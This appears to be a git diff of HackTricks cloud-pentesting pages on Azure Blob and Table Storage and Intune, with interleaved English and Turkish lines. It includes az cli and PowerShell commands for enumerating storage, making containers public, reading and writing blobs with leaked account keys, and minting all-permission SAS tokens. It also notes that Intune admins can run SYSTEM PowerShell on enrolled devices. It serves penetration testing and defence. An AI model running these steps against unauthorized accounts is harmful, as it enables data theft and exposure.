<table data-header-hidden><thead><tr><th width="197">Depolama Hizmeti</th><th>Uç Nokta</th></tr></thead><tbody><tr><td><strong>Blob depolama</strong></td><td><code>https://&#x3C;storage-account>.blob.core.windows.net</code><br><br><code>https://&#x3C;stg-acc>.blob.core.windows.net/&#x3C;container-name>?restype=container&#x26;comp=list</code></td></tr><tr><td><strong>Veri Gölü Depolama</strong></td><td><code>https://&#x3C;storage-account>.dfs.core.windows.net</code></td></tr><tr><td><strong>Azure Dosyaları</strong></td><td><code>https://&#x3C;storage-account>.file.core.windows.net</code></td></tr><tr><td><strong>Kuyruk depolama</strong></td><td><code>https://&#x3C;storage-account>.queue.core.windows.net</code></td></tr><tr><td><strong>Tablo depolama</strong></td><td><code>https://&#x3C;storage-account>.table.core.windows.net</code></td></tr></tbody></table>
### Public Exposure
### Kamuya Açıklık
If "Allow Blob public access" is **enabled** (disabled by default), when creating a container it's possible to:
"Blob kamuya açık erişime izin ver" **etkinleştirildiğinde** (varsayılan olarak devre dışı), bir konteyner oluştururken:
- Give **public access to read blobs** (you need to know the name).
- **List container blobs** and **read** them.
- Make it fully **private**
- **Blobları okumak için kamuya açık erişim** verilebilir (adını bilmeniz gerekir).
- **Konteyner bloblarını listeleyin** ve **okuyun**.
- Tamamen **özel** hale getirin.
<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfoetUnYBPWQpRrWNnnlbqWpl8Rdoaeg5uBrCVlvcNDlnKwQHjZe8nUb2SfPspBgbu-lCZLmUei-hFi_Jl2eKbaxUtBGTjdUSDmkrcwr90VZkmuMjk9tyh92p75btfyzGiUTa0-=s2048?key=m8TV59TrCFPlkiNnmhYx3aZt" alt=""><figcaption></figcaption></figure>
### Connect to Storage
### Depolama ile Bağlantı
If you find any **storage** you can connect to you could use the tool [**Microsoft Azure Storage Explorer**](https://azure.microsoft.com/es-es/products/storage/storage-explorer/) to do so.
Herhangi bir **depolama** bulursanız, bunu yapmak için [**Microsoft Azure Storage Explorer**](https://azure.microsoft.com/es-es/products/storage/storage-explorer/) aracını kullanabilirsiniz.
## Access to Storage <a href="#about-blob-storage" id="about-blob-storage"></a>
## Depolamaya Erişim <a href="#about-blob-storage" id="about-blob-storage"></a>
### RBAC
It's possible to use Entra ID principals with **RBAC roles** to access storage accounts and it's the recommended way.
Depolama hesaplarına erişmek için **RBAC rolleri** ile Entra ID ilkelerini kullanmak mümkündür ve bu önerilen yoldur.
### Access Keys
### Erişim Anahtarları
The storage accounts have access keys that can be used to access it. This provides f**ull access to the storage account.**
Depolama hesaplarının erişim anahtarları vardır ve bunlar kullanılarak erişim sağlanabilir. Bu, depolama hesabına **tam erişim sağlar.**
<figure><img src="../../../images/image (5).png" alt=""><figcaption></figcaption></figure>
### **Shared Keys & Lite Shared Keys**
### **Paylaşılan Anahtarlar ve Hafif Paylaşılan Anahtarlar**
It's possible to [**generate Shared Keys**](https://learn.microsoft.com/en-us/rest/api/storageservices/authorize-with-shared-key) signed with the access keys to authorize access to certain resources via a signed URL.
Belirli kaynaklara imzalı bir URL aracılığıyla erişimi yetkilendirmek için erişim anahtarları ile imzalanmış [**Paylaşılan Anahtarlar**](https://learn.microsoft.com/en-us/rest/api/storageservices/authorize-with-shared-key) oluşturmak mümkündür.
> [!NOTE]
> Note that the `CanonicalizedResource` part represents the storage services resource (URI). And if any part in the URL is encoded, it should also be encoded inside the `CanonicalizedResource`.
> `CanonicalizedResource` kısmının depolama hizmetleri kaynağını (URI) temsil ettiğini unutmayın. Ve URL'deki herhangi bir kısım kodlanmışsa, `CanonicalizedResource` içinde de kodlanmalıdır.
> [!NOTE]
> This is **used by default by `az` cli** to authenticate requests. To make it use the Entra ID principal credentials indicate the param `--auth-mode login`.
- It's possible to generate a **shared key for blob, queue and file services** signing the following information:
> Bu, istekleri kimlik doğrulamak için **varsayılan olarak `az` cli tarafından kullanılır**. Entra ID ilkesi kimlik bilgilerini kullanmasını sağlamak için `--auth-mode login` parametresini belirtin.
- Aşağıdaki bilgileri imzalayarak **blob, kuyruk ve dosya hizmetleri için paylaşılan bir anahtar** oluşturmak mümkündür:
```bash
StringToSign = VERB + "\n" +
Content-Encoding + "\n" +
Content-Language + "\n" +
Content-Length + "\n" +
Content-MD5 + "\n" +
Content-Type + "\n" +
Date + "\n" +
If-Modified-Since + "\n" +
If-Match + "\n" +
If-None-Match + "\n" +
If-Unmodified-Since + "\n" +
Range + "\n" +
CanonicalizedHeaders +
CanonicalizedResource;
Content-Encoding + "\n" +
Content-Language + "\n" +
Content-Length + "\n" +
Content-MD5 + "\n" +
Content-Type + "\n" +
Date + "\n" +
If-Modified-Since + "\n" +
If-Match + "\n" +
If-None-Match + "\n" +
If-Unmodified-Since + "\n" +
Range + "\n" +
CanonicalizedHeaders +
CanonicalizedResource;
```
- It's possible to generate a **shared key for table services** signing the following information:
- Aşağıdaki bilgileri imzalayarak **tablo hizmetleri için paylaşılan bir anahtar** oluşturmak mümkündür:
```bash
StringToSign = VERB + "\n" +
Content-MD5 + "\n" +
Content-Type + "\n" +
Date + "\n" +
CanonicalizedResource;
Content-MD5 + "\n" +
Content-Type + "\n" +
Date + "\n" +
CanonicalizedResource;
```
- It's possible to generate a **lite shared key for blob, queue and file services** signing the following information:
- **Blob, kuyruk ve dosya hizmetleri** için bir **lite paylaşımlı anahtar** oluşturmak mümkündür, aşağıdaki bilgileri imzalayarak:
```bash
StringToSign = VERB + "\n" +
Content-MD5 + "\n" +
Content-Type + "\n" +
Date + "\n" +
CanonicalizedHeaders +
CanonicalizedResource;
Content-MD5 + "\n" +
Content-Type + "\n" +
Date + "\n" +
CanonicalizedHeaders +
CanonicalizedResource;
```
- It's possible to generate a **lite shared key for table services** signing the following information:
- Aşağıdaki bilgileri imzalayarak **lite shared key for table services** oluşturmak mümkündür:
```bash
StringToSign = Date + "\n"
CanonicalizedResource
CanonicalizedResource
```
Then, to use the key, it can be done in the Authorization header following the syntax:
Sonra, anahtarı kullanmak için, aşağıdaki sözdizimini takip eden Authorization başlığında yapılabilir:
```bash
Authorization="[SharedKey|SharedKeyLite] <AccountName>:<Signature>"
#e.g.
Authorization: SharedKey myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08=
PUT http://myaccount/mycontainer?restype=container&timeout=30 HTTP/1.1
x-ms-version: 2014-02-14
x-ms-date: Fri, 26 Jun 2015 23:39:12 GMT
Authorization: SharedKey myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08=
Content-Length: 0
x-ms-version: 2014-02-14
x-ms-date: Fri, 26 Jun 2015 23:39:12 GMT
Authorization: SharedKey myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08=
Content-Length: 0
```
### **Paylaşılan Erişim İmzası** (SAS)
### **Shared Access Signature** (SAS)
Paylaşılan Erişim İmzaları (SAS), bir Azure Depolama hesabındaki kaynaklara erişim için **belirli izinler veren** güvenli, zaman sınırlı URL'lerdir. Erişim anahtarları tüm kaynaklara tam yönetim erişimi sağlarken, SAS izinleri (okuma veya yazma gibi) belirleyerek ve bir son kullanma tarihi tanımlayarak daha ayrıntılı kontrol sağlar.
Shared Access Signatures (SAS) are secure, time-limited URLs that **grant specific permissions to access resource**s in an Azure Storage account without exposing the account's access keys. While access keys provide full administrative access to all resources, SAS allows for granular control by specifying permissions (like read or write) and defining an expiration time.
#### SAS Türleri
#### SAS Types
- **Kullanıcı delegasyonu SAS**: Bu, SAS'ı imzalayacak ve izinleri kullanıcıdan SAS'a devredecek bir **Entra ID ilkesi** üzerinden oluşturulur. Sadece **blob ve veri gölü depolama** ile kullanılabilir ([docs](https://learn.microsoft.com/en-us/rest/api/storageservices/create-user-delegation-sas)). Tüm oluşturulan kullanıcı delegeli SAS'ları **iptal etmek** mümkündür.
- Kullanıcının sahip olduğu izinlerden "daha fazla" izinle bir delegasyon SAS oluşturmak mümkündür. Ancak, ilke bu izinlere sahip değilse, çalışmaz (privesc yok).
- **Hizmet SAS**: Bu, depolama hesabının **erişim anahtarlarından** biri kullanılarak imzalanır. Tek bir depolama hizmetindeki belirli kaynaklara erişim sağlamak için kullanılabilir. Anahtar yenilendiğinde, SAS çalışmayı durdurur.
- **Hesap SAS**: Bu da depolama hesabının **erişim anahtarlarından** biri ile imzalanır. Depolama hesabı hizmetleri (Blob, Kuyruk, Tablo, Dosya) genelinde kaynaklara erişim sağlar ve hizmet düzeyindeki işlemleri içerebilir.
- **User delegation SAS**: This is created from an **Entra ID principal** which will sign the SAS and delegate the permissions from the user to the SAS. It can only be used with **blob and data lake storage** ([docs](https://learn.microsoft.com/en-us/rest/api/storageservices/create-user-delegation-sas)). It's possible to **revoke** all generated user delegated SAS.
- Even if it's possible to generate a delegation SAS with "more" permissions than the ones the user has. However, if the principal doesn't have them, it won't work (no privesc).
- **Service SAS**: This is signed using one of the storage account **access keys**. It can be used to grant access to specific resources in a single storage service. If the key is renewed, the SAS will stop working.
- **Account SAS**: It's also signed with one of the storage account **access keys**. It grants access to resources across a storage account services (Blob, Queue, Table, File) and can include service-level operations.
A SAS URL signed by an **access key** looks like this:
Bir **erişim anahtarı** ile imzalanmış bir SAS URL'si şöyle görünür:
- `https://<container_name>.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D`
A SAS URL signed as a **user delegation** looks like this:
Bir **kullanıcı delegasyonu** olarak imzalanmış bir SAS URL'si şöyle görünür:
- `https://<container_name>.blob.core.windows.net/testing-container?sp=r&st=2024-11-22T15:07:40Z&se=2024-11-22T23:07:40Z&skoid=d77c71a1-96e7-483d-bd51-bd753aa66e62&sktid=fdd066e1-ee37-49bc-b08f-d0e152119b04&skt=2024-11-22T15:07:40Z&ske=2024-11-22T23:07:40Z&sks=b&skv=2022-11-02&spr=https&sv=2022-11-02&sr=c&sig=7s5dJyeE6klUNRulUj9TNL0tMj2K7mtxyRc97xbYDqs%3D`
Note some **http params**:
Bazı **http parametreleri**:
- The **`se`** param indicates the **expiration date** of the SAS
- The **`sp`** param indicates the **permissions** of the SAS
- The **`sig`** is the **signature** validating the SAS
- **`se`** parametresi SAS'ın **son kullanma tarihini** belirtir.
- **`sp`** parametresi SAS'ın **izinlerini** belirtir.
- **`sig`** SAS'ı doğrulayan **imzadır**.
#### SAS permissions
#### SAS izinleri
When generating a SAS it's needed to indicate the permissions that it should be granting. Depending on the objet the SAS is being generated over different permissions might be included. For example:
Bir SAS oluştururken, vermesi gereken izinleri belirtmek gerekir. SAS'ın oluşturulduğu nesneye bağlı olarak farklı izinler dahil edilebilir. Örneğin:
- (a)dd, (c)reate, (d)elete, (e)xecute, (f)ilter_by_tags, (i)set_immutability_policy, (l)ist, (m)ove, (r)ead, (t)ag, (w)rite, (x)delete_previous_version, (y)permanent_delete
## SFTP Support for Azure Blob Storage
## Azure Blob Depolama için SFTP Desteği
Azure Blob Storage now supports the SSH File Transfer Protocol (SFTP), enabling secure file transfer and management directly to Blob Storage without requiring custom solutions or third-party products.
Azure Blob Depolama artık SSH Dosya Transfer Protokolü (SFTP) desteği sunuyor, bu da özel çözümler veya üçüncü taraf ürünler gerektirmeden doğrudan Blob Depolama'ya güvenli dosya transferi ve yönetimi sağlar.
### Key Features
### Ana Özellikler
- Protocol Support: SFTP works with Blob Storage accounts configured with hierarchical namespace (HNS). This organizes blobs into directories and subdirectories for easier navigation.
- Security: SFTP uses local user identities for authentication and does not integrate with RBAC or ABAC. Each local user can authenticate via:
- Azure-generated passwords
- Public-private SSH key pairs
- Granular Permissions: Permissions such as Read, Write, Delete, and List can be assigned to local users for up to 100 containers.
- Networking Considerations: SFTP connections are made through port 22. Azure supports network configurations like firewalls, private endpoints, or virtual networks to secure SFTP traffic.
- Protokol Desteği: SFTP, hiyerarşik ad alanı (HNS) ile yapılandırılmış Blob Depolama hesaplarıyla çalışır. Bu, blob'ları daha kolay gezinme için dizinler ve alt dizinler halinde düzenler.
- Güvenlik: SFTP, kimlik doğrulama için yerel kullanıcı kimliklerini kullanır ve RBAC veya ABAC ile entegre olmaz. Her yerel kullanıcı aşağıdaki yöntemlerle kimlik doğrulaması yapabilir:
- Azure tarafından oluşturulan şifreler
- Genel-özel SSH anahtar çiftleri
- Ayrıntılı İzinler: Okuma, Yazma, Silme ve Listeleme gibi izinler, yerel kullanıcılara 100'e kadar konteyner için atanabilir.
- Ağ Dikkate Alınması: SFTP bağlantıları 22 numaralı port üzerinden yapılır. Azure, SFTP trafiğini güvence altına almak için güvenlik duvarları, özel uç noktalar veya sanal ağlar gibi ağ yapılandırmalarını destekler.
### Setup Requirements
### Kurulum Gereksinimleri
- Hierarchical Namespace: HNS must be enabled when creating the storage account.
- Supported Encryption: Requires Microsoft Security Development Lifecycle (SDL)-approved cryptographic algorithms (e.g., rsa-sha2-256, ecdsa-sha2-nistp256).
- SFTP Configuration:
- Enable SFTP on the storage account.
- Create local user identities with appropriate permissions.
- Configure home directories for users to define their starting location within the container.
- Hiyerarşik Ad Alanı: Depolama hesabı oluşturulurken HNS etkinleştirilmelidir.
- Desteklenen Şifreleme: Microsoft Güvenlik Geliştirme Yaşam Döngüsü (SDL) onaylı kriptografik algoritmalar gereklidir (örn. rsa-sha2-256, ecdsa-sha2-nistp256).
- SFTP Yapılandırması:
- Depolama hesabında SFTP'yi etkinleştirin.
- Uygun izinlere sahip yerel kullanıcı kimlikleri oluşturun.
- Kullanıcıların konteyner içindeki başlangıç konumlarını tanımlamak için ana dizinleri yapılandırın.
### Permissions
### İzinler
| Permission | Symbol | Description |
| İzin | Sembol | ıklama |
| ---------------------- | ------ | ------------------------------------ |
| **Read** | `r` | Read file content. |
| **Write** | `w` | Upload files and create directories. |
| **List** | `l` | List contents of directories. |
| **Delete** | `d` | Delete files or directories. |
| **Create** | `c` | Create files or directories. |
| **Modify Ownership** | `o` | Change the owning user or group. |
| **Modify Permissions** | `p` | Change ACLs on files or directories. |
| **Okuma** | `r` | Dosya içeriğini oku. |
| **Yazma** | `w` | Dosyaları yükle ve dizinler oluştur.|
| **Listeleme** | `l` | Dizinlerin içeriğini listele. |
| **Silme** | `d` | Dosyaları veya dizinleri sil. |
| **Oluşturma** | `c` | Dosyaları veya dizinleri oluştur. |
| **Sahipliği Değiştirme** | `o` | Sahip kullanıcıyı veya grubu değiştir.|
| **İzinleri Değiştirme** | `p` | Dosyalar veya dizinler üzerindeki ACL'leri değiştir. |
## Enumeration
## Sayım
{{#tabs }}
{{#tab name="az cli" }}
```bash
# Get storage accounts
az storage account list #Get the account name from here
@@ -231,31 +220,31 @@ az storage account list #Get the account name from here
az storage container list --account-name <name>
## Check if public access is allowed
az storage container show-permission \
--account-name <acc-name> \
-n <container-name>
--account-name <acc-name> \
-n <container-name>
## Make a container public
az storage container set-permission \
--public-access container \
--account-name <acc-name> \
-n <container-name>
--public-access container \
--account-name <acc-name> \
-n <container-name>
## List blobs in a container
az storage blob list \
--container-name <container name> \
--account-name <account name>
--container-name <container name> \
--account-name <account name>
## Download blob
az storage blob download \
--account-name <account name> \
--container-name <container name> \
--name <blob name> \
--file </path/to/local/file>
--account-name <account name> \
--container-name <container name> \
--name <blob name> \
--file </path/to/local/file>
## Create container policy
az storage container policy create \
--account-name mystorageaccount \
--container-name mycontainer \
--name fullaccesspolicy \
--permissions racwdl \
--start 2023-11-22T00:00Z \
--expiry 2024-11-22T00:00Z
--account-name mystorageaccount \
--container-name mycontainer \
--name fullaccesspolicy \
--permissions racwdl \
--start 2023-11-22T00:00Z \
--expiry 2024-11-22T00:00Z
# QUEUE
az storage queue list --account-name <name>
@@ -268,81 +257,79 @@ az storage account show -n <name> --query "{KeyPolicy:keyPolicy}"
## Once having the key, it's possible to use it with the argument --account-key
## Enum blobs with account key
az storage blob list \
--container-name <container name> \
--account-name <account name> \
--account-key "ZrF40pkVKvWPUr[...]v7LZw=="
--container-name <container name> \
--account-name <account name> \
--account-key "ZrF40pkVKvWPUr[...]v7LZw=="
## Download a file using an account key
az storage blob download \
--account-name <account name> \
--account-key "ZrF40pkVKvWPUr[...]v7LZw==" \
--container-name <container name> \
--name <blob name> \
--file </path/to/local/file>
--account-name <account name> \
--account-key "ZrF40pkVKvWPUr[...]v7LZw==" \
--container-name <container name> \
--name <blob name> \
--file </path/to/local/file>
## Upload a file using an account key
az storage blob upload \
--account-name <account name> \
--account-key "ZrF40pkVKvWPUr[...]v7LZw==" \
--container-name <container name> \
--file </path/to/local/file>
--account-name <account name> \
--account-key "ZrF40pkVKvWPUr[...]v7LZw==" \
--container-name <container name> \
--file </path/to/local/file>
# SAS
## List access policies
az storage <container|queue|share|table> policy list \
--account-name <acc name> \
--container-name <container name>
--account-name <acc name> \
--container-name <container name>
## Generate SAS with all permissions using an access key
az storage <container|queue|share|table|blob> generate-sas \
--permissions acdefilmrtwxy \
--expiry 2024-12-31T23:59:00Z \
--account-name <acc-name> \
-n <container-name>
--permissions acdefilmrtwxy \
--expiry 2024-12-31T23:59:00Z \
--account-name <acc-name> \
-n <container-name>
## Generate SAS with all permissions using via user delegation
az storage <container|queue|share|table|blob> generate-sas \
--permissions acdefilmrtwxy \
--expiry 2024-12-31T23:59:00Z \
--account-name <acc-name> \
--as-user --auth-mode login \
-n <container-name>
--permissions acdefilmrtwxy \
--expiry 2024-12-31T23:59:00Z \
--account-name <acc-name> \
--as-user --auth-mode login \
-n <container-name>
## Generate account SAS
az storage account generate-sas \
--expiry 2024-12-31T23:59:00Z \
--account-name <acc-name> \
--services qt \
--resource-types sco \
--permissions acdfilrtuwxy
--expiry 2024-12-31T23:59:00Z \
--account-name <acc-name> \
--services qt \
--resource-types sco \
--permissions acdfilrtuwxy
## Use the returned SAS key with the param --sas-token
## e.g.
az storage blob show \
--account-name <account name> \
--container-name <container name> \
--sas-token 'se=2024-12-31T23%3A59%3A00Z&sp=racwdxyltfmei&sv=2022-11-02&sr=c&sig=ym%2Bu%2BQp5qqrPotIK5/rrm7EMMxZRwF/hMWLfK1VWy6E%3D' \
--name 'asd.txt'
--account-name <account name> \
--container-name <container name> \
--sas-token 'se=2024-12-31T23%3A59%3A00Z&sp=racwdxyltfmei&sv=2022-11-02&sr=c&sig=ym%2Bu%2BQp5qqrPotIK5/rrm7EMMxZRwF/hMWLfK1VWy6E%3D' \
--name 'asd.txt'
#Local-Users
## List users
az storage account local-user list \
--account-name <storage-account-name> \
--resource-group <resource-group-name>
--account-name <storage-account-name> \
--resource-group <resource-group-name>
## Get user
az storage account local-user show \
--account-name <storage-account-name> \
--resource-group <resource-group-name> \
--name <local-user-name>
--account-name <storage-account-name> \
--resource-group <resource-group-name> \
--name <local-user-name>
## List keys
az storage account local-user list \
--account-name <storage-account-name> \
--resource-group <resource-group-name>
--account-name <storage-account-name> \
--resource-group <resource-group-name>
```
{{#endtab }}
{{#tab name="Az PowerShell" }}
```powershell
# Get storage accounts
Get-AzStorageAccount | fl
@@ -359,16 +346,16 @@ Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name
# Create a Container Policy
New-AzStorageContainerStoredAccessPolicy `
-Context (Get-AzStorageAccount -Name <NAME> -ResourceGroupName <NAME>).Context `
-Container <container-name> `
-Policy <policy-name> `
-Permission racwdl `
-StartTime (Get-Date "2023-11-22T00:00Z") `
-ExpiryTime (Get-Date "2024-11-22T00:00Z")
-Context (Get-AzStorageAccount -Name <NAME> -ResourceGroupName <NAME>).Context `
-Container <container-name> `
-Policy <policy-name> `
-Permission racwdl `
-StartTime (Get-Date "2023-11-22T00:00Z") `
-ExpiryTime (Get-Date "2024-11-22T00:00Z")
#Get Container policy
Get-AzStorageContainerStoredAccessPolicy `
-Context (Get-AzStorageAccount -Name <NAME> -ResourceGroupName <NAME>).Context `
-Container "storageaccount1994container"
-Context (Get-AzStorageAccount -Name <NAME> -ResourceGroupName <NAME>).Context `
-Container "storageaccount1994container"
# Queue Management
Get-AzStorageQueue -Context (Get-AzStorageAccount -Name <NAME> -ResourceGroupName <NAME>).Context
@@ -377,65 +364,60 @@ Get-AzStorageQueue -Context (Get-AzStorageAccount -Name <NAME> -ResourceGroupNam
#Blob Container
Get-AzStorageBlob -Container <container-name> -Context $(Get-AzStorageAccount -name "teststorageaccount1998az" -ResourceGroupName "testStorageGroup").Context
Get-AzStorageBlobContent `
-Container <container-name> `
-Blob <blob-name> `
-Destination <local-path> `
-Context $(Get-AzStorageAccount -name "teststorageaccount1998az" -ResourceGroupName "testStorageGroup").Context
-Container <container-name> `
-Blob <blob-name> `
-Destination <local-path> `
-Context $(Get-AzStorageAccount -name "teststorageaccount1998az" -ResourceGroupName "testStorageGroup").Context
Set-AzStorageBlobContent `
-Container <container-name> `
-File <local-file-path> `
-Blob <blob-name> `
-Context $(Get-AzStorageAccount -name "teststorageaccount1998az" -ResourceGroupName "testStorageGroup").Context
-Container <container-name> `
-File <local-file-path> `
-Blob <blob-name> `
-Context $(Get-AzStorageAccount -name "teststorageaccount1998az" -ResourceGroupName "testStorageGroup").Context
# Shared Access Signatures (SAS)
Get-AzStorageContainerAcl `
-Container <container-name> `
-Context (Get-AzStorageAccount -Name <NAME> -ResourceGroupName <NAME>).Context
-Container <container-name> `
-Context (Get-AzStorageAccount -Name <NAME> -ResourceGroupName <NAME>).Context
New-AzStorageBlobSASToken `
-Context $ctx `
-Container <container-name> `
-Blob <blob-name> `
-Permission racwdl `
-ExpiryTime (Get-Date "2024-12-31T23:59:00Z")
-Context $ctx `
-Container <container-name> `
-Blob <blob-name> `
-Permission racwdl `
-ExpiryTime (Get-Date "2024-12-31T23:59:00Z")
```
{{#endtab }}
{{#endtabs }}
### File Shares
### Dosya Paylaşımları
{{#ref}}
az-file-shares.md
{{#endref}}
## Privilege Escalation
## Yetki Yükseltme
{{#ref}}
../az-privilege-escalation/az-storage-privesc.md
{{#endref}}
## Post Exploitation
## İstismar Sonrası
{{#ref}}
../az-post-exploitation/az-blob-storage-post-exploitation.md
{{#endref}}
## Persistence
## Süreklilik
{{#ref}}
../az-persistence/az-storage-persistence.md
{{#endref}}
## References
## Referanslar
- [https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction](https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction)
- [https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview](https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview)
- [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
{{#include ../../../banners/hacktricks-training.md}}

68
src/pentesting-cloud/azure-security/az-services/az-table-storage.md
View File

@@ -2,35 +2,34 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
**Azure Table Storage** is a NoSQL key-value store designed for storing large volumes of structured, non-relational data. It offers high availability, low latency, and scalability to handle large datasets efficiently. Data is organized into tables, with each entity identified by a partition key and row key, enabling fast lookups. It supports features like encryption at rest, role-based access control, and shared access signatures for secure, managed storage suitable for a wide range of applications.
**Azure Table Storage**, büyük hacimli yapılandırılmış, ilişkisel olmayan verileri depolamak için tasarlanmış bir NoSQL anahtar-değer deposudur. Yüksek kullanılabilirlik, düşük gecikme süresi ve büyük veri kümelerini verimli bir şekilde işlemek için ölçeklenebilirlik sunar. Veriler, her varlığın bir bölüm anahtarı ve satır anahtarı ile tanımlandığı tablolara organize edilir, bu da hızlı sorgulama sağlar. Verilerin dinlenme sırasında şifrelenmesi, rol tabanlı erişim kontrolü ve güvenli, yönetilen depolama için paylaşılan erişim imzaları gibi özellikleri destekler; bu da geniş bir uygulama yelpazesi için uygundur.
There **isn't built-in backup mechanism** for table storage.
Tablo depolama için **yerleşik bir yedekleme mekanizması yoktur**.
### Keys
### Anahtarlar
#### **PartitionKey**
- The **PartitionKey groups entities into logical partitions**. Entities with the same PartitionKey are stored together, which improves query performance and scalability.
- Example: In a table storing employee data, `PartitionKey` might represent a department, e.g., `"HR"` or `"IT"`.
- **PartitionKey, varlıkları mantıksal bölümlere gruplar**. Aynı PartitionKey'e sahip varlıklar birlikte depolanır, bu da sorgu performansını ve ölçeklenebilirliği artırır.
- Örnek: Bir çalışan verisi depolayan tabloda, `PartitionKey` bir departmanı temsil edebilir, örneğin, `"HR"` veya `"IT"`.
#### **RowKey**
- The **RowKey is the unique identifier** for an entity within a partition. When combined with the PartitionKey, it ensures that each entity in the table has a globally unique identifier.
- Example: For the `"HR"` partition, `RowKey` might be an employee ID, e.g., `"12345"`.
- **RowKey, bir bölüm içindeki bir varlık için benzersiz tanımlayıcıdır**. PartitionKey ile birleştirildiğinde, tablodaki her varlığın küresel olarak benzersiz bir tanımlayıcıya sahip olmasını sağlar.
- Örnek: `"HR"` bölümünde, `RowKey` bir çalışan kimliği olabilir, örneğin, `"12345"`.
#### **Other Properties (Custom Properties)**
#### **Diğer Özellikler (Özel Özellikler)**
- Besides the PartitionKey and RowKey, an entity can have additional **custom properties to store data**. These are user-defined and act like columns in a traditional database.
- Properties are stored as **key-value pairs**.
- Example: `Name`, `Age`, `Title` could be custom properties for an employee.
- PartitionKey ve RowKey'in yanı sıra, bir varlık ek **özel özelliklere sahip olabilir**. Bunlar kullanıcı tanımlıdır ve geleneksel bir veritabanındaki sütunlar gibi işlev görür.
- Özellikler **anahtar-değer çiftleri** olarak depolanır.
- Örnek: `Name`, `Age`, `Title` bir çalışan için özel özellikler olabilir.
## Enumeration
## Sayım
{{#tabs}}
{{#tab name="az cli"}}
```bash
# Get storage accounts
az storage account list
@@ -40,32 +39,30 @@ az storage table list --account-name <name>
# Read table
az storage entity query \
--account-name <name> \
--table-name <t-name> \
--top 10
--account-name <name> \
--table-name <t-name> \
--top 10
# Write table
az storage entity insert \
--account-name <STORAGE_ACCOUNT_NAME> \
--table-name <TABLE_NAME> \
--entity PartitionKey=<PARTITION_KEY> RowKey=<ROW_KEY> <PROPERTY_KEY>=<PROPERTY_VALUE>
--account-name <STORAGE_ACCOUNT_NAME> \
--table-name <TABLE_NAME> \
--entity PartitionKey=<PARTITION_KEY> RowKey=<ROW_KEY> <PROPERTY_KEY>=<PROPERTY_VALUE>
# Write example
az storage entity insert \
--account-name mystorageaccount \
--table-name mytable \
--entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
--account-name mystorageaccount \
--table-name mytable \
--entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
# Update row
az storage entity merge \
--account-name mystorageaccount \
--table-name mytable \
--entity PartitionKey=pk1 RowKey=rk1 Age=31
--account-name mystorageaccount \
--table-name mytable \
--entity PartitionKey=pk1 RowKey=rk1 Age=31
```
{{#endtab}}
{{#tab name="PowerShell"}}
```powershell
# Get storage accounts
Get-AzStorageAccount
@@ -73,20 +70,19 @@ Get-AzStorageAccount
# List tables
Get-AzStorageTable -Context (Get-AzStorageAccount -Name <mystorageaccount> -ResourceGroupName <ResourceGroupName>).Context
```
{{#endtab}}
{{#endtabs}}
> [!NOTE]
> By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login`.
> Varsayılan olarak `az` cli, bir hesap anahtarını imzalamak ve işlemi gerçekleştirmek için bir hesap anahtarı kullanacaktır. Entra ID anahtar ayrıcalıklarını kullanmak için `--auth-mode login` parametrelerini kullanın.
> [!TIP]
> Use the param `--account-key` to indicate the account key to use\
> Use the param `--sas-token` with the SAS token to access via a SAS token
> Kullanılacak hesap anahtarını belirtmek için `--account-key` parametresini kullanın\
> SAS token ile erişmek için `--sas-token` parametresini SAS token ile kullanın
## Privilege Escalation
Same as storage privesc:
Depolama privesc ile aynı:
{{#ref}}
../az-privilege-escalation/az-storage-privesc.md
@@ -100,14 +96,10 @@ Same as storage privesc:
## Persistence
Same as storage persistence:
Depolama kalıcılığı ile aynı:
{{#ref}}
../az-persistence/az-storage-persistence.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

32
src/pentesting-cloud/azure-security/az-services/intune.md
View File

@@ -2,34 +2,28 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
Microsoft Intune is designed to streamline the process of **app and device management**. Its capabilities extend across a diverse range of devices, encompassing mobile devices, desktop computers, and virtual endpoints. The core functionality of Intune revolves around **managing user access and simplifying the administration of applications** and devices within an organization's network.
Microsoft Intune, **uygulama ve cihaz yönetimi** sürecini kolaylaştırmak için tasarlanmıştır. Yetenekleri, mobil cihazlar, masaüstü bilgisayarlar ve sanal uç noktalar dahil olmak üzere çeşitli cihazları kapsamaktadır. Intune'un temel işlevselliği, bir organizasyonun ağındaki **kullanıcı erişimini yönetmek ve uygulamaların** ve cihazların yönetimini basitleştirmek etrafında döner.
## Cloud -> On-Prem
A user with **Global Administrator** or **Intune Administrator** role can execute **PowerShell** scripts on any **enrolled Windows** device.\
The **script** runs with **privileges** of **SYSTEM** on the device only once if it doesn't change, and from Intune it's **not possible to see the output** of the script.
## Bulut -> Yerel
**Global Administrator** veya **Intune Administrator** rolüne sahip bir kullanıcı, herhangi bir **kayıtlı Windows** cihazında **PowerShell** betikleri çalıştırabilir.\
**Betik**, cihazda yalnızca bir kez **SYSTEM** ayrıcalıklarıyla çalışır, eğer değişmezse ve Intune'dan **betiğin çıktısını görmek mümkün değildir.**
```powershell
Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"
```
1. [https://endpoint.microsoft.com/#home](https://endpoint.microsoft.com/#home) adresine giriş yapın veya Pass-The-PRT kullanın.
